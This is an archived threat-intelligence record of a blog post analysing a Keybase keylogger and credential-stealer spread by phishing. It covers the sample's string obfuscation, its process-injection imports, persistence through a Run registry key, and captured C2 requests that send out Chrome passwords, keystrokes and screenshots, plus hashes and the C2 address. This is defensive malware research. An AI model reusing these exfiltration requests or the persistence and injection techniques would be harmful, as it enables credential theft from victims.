{
	"id": "c11b6364-db85-4f6c-846a-f7ae77d5a377",
	"created_at": "2026-04-06T00:06:56.322603Z",
	"updated_at": "2026-04-10T03:21:22.493307Z",
	"deleted_at": null,
	"sha1_hash": "6344461bfc916bae830a22bfe1d08ea3134e95a7",
	"title": "Keybase Logger/Clipboard/CredsStealer campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 546671,
	"plain_text": "Keybase Logger/Clipboard/CredsStealer campaign\r\nArchived: 2026-04-05 22:53:09 UTC\r\nWhile checking my email the other day I came across a phishing email that seemed quite suspicious; see below.\r\nIt came with a compressed file named Product_details.gz which, when extracted, presented a file named Payment_45476.scr.\r\nThis file is a .NET-compiled Windows executable. It was opened with a tool called ILSpy in order to analyze its inner workings.\r\n- Looking at its main function, it seems it creates two threads:\r\nhttps://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html\r\nPage 1 of 7\r\n\r\nThe function below looks to be using a primitive form of obfuscation that consists of reversing strings.\r\nLooking at the function below, the malware uses an Encryption class that handles the decryption of several strings found throughout the code; see below.\r\n\r\nLooking at the function below, it seems it invokes the DecryptText function declared in the Encryption class.\r\nThe decoded data corresponds to the imports the malware will be using:\r\nCreateProcessA\r\nGetThreadContext\r\nSetThreadContext\r\nWow64SetThreadContext\r\nReadProcessMemory\r\nWriteProcessMemory\r\nNtUnmapViewOfSection\r\nVirtualAllocEx\r\nResumeThread\r\n\r\nWhen this sample was executed it was clear the sample had malicious intent. It established persistence by copying itself to the startup folder and setting the autorun registry key at startup. The malware names itself \"Important.exe\", which, on looking at the code, seems to be a static value set by the author. See below for registry and file activity.\r\n [CreateFile] Payment_45476.exe:1316 \u003e %AllUsersProfile%\\Important.exe [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]\r\n [RegSetValue] Payment_45476.exe:1316 \u003e HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\50057d8e6fa9271dc2110b90\r\nThe malware then starts to reach out to its C2. The requests indicate the malware has the following capabilities:\r\nTakes a screenshot of the current working window.\r\nActs as a keylogger and credential stealer.\r\nCaptures clipboard content.\r\n GET /wp-includes/css/keybase/post.php?type=notification\u0026machinename=PETERPC\u0026machinetime=11:58%20PM HTTP/1.1\r\n \"steals passwords from chrome password cache\"\r\n GET /wp-includes/css/keybase/post.php?type=passwords\u0026machinename=PETERPC\u0026application=Chrome\u0026link=http://gsl8411.ru HTTP/1.1\r\n \"it has keylogging capabilities\"\r\n GET /wp-includes/css/keybase/post.php?type=keystrokes\u0026machinename=PETERPC\u0026windowtitle=Filter\u0026keystrokestyped=tests HTTP/1.1\r\n POST /wp-includes/css/keybase/image/upload.php HTTP/1.1\r\n Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930\r\n Host: examgist.com\r\nOn looking further at the C2 callbacks, it was noticed that the locations in which the screenshots were shared were world readable. See sample below:\r\n\r\nThe login panel was also available:\r\n\r\nIn conclusion, this malware is considered primitive based on its design. However, it can certainly cause damage: its keylogging, screen sharing and credential stealing capabilities make it very attractive to skiddies. Thank you for reading.\r\nMD5:\r\n7c6a2697df26582b438c21ee7ce5b0b1  Payment_45476.scr\r\n398af2fd86ce37d6d3052eb7503b2790  Order_25464.scr\r\n78c4256eb2003db620a45adba44f404c  Order_34002.gz\r\n9dada7b67f5066e6f5d394222240beb9  Product_details.gz\r\nC2:\r\nhttp://examgist[.]com/wp-includes/css/keybase/login.php\r\nVT:\r\nhttps://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/\r\nSource: https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html"
	],
	"report_names": [
		"keybase-loggerclipboardcredsstealer.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434016,
	"ts_updated_at": 1775791282,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6344461bfc916bae830a22bfe1d08ea3134e95a7.pdf",
		"text": "https://archive.orkl.eu/6344461bfc916bae830a22bfe1d08ea3134e95a7.txt",
		"img": "https://archive.orkl.eu/6344461bfc916bae830a22bfe1d08ea3134e95a7.jpg"
	}
}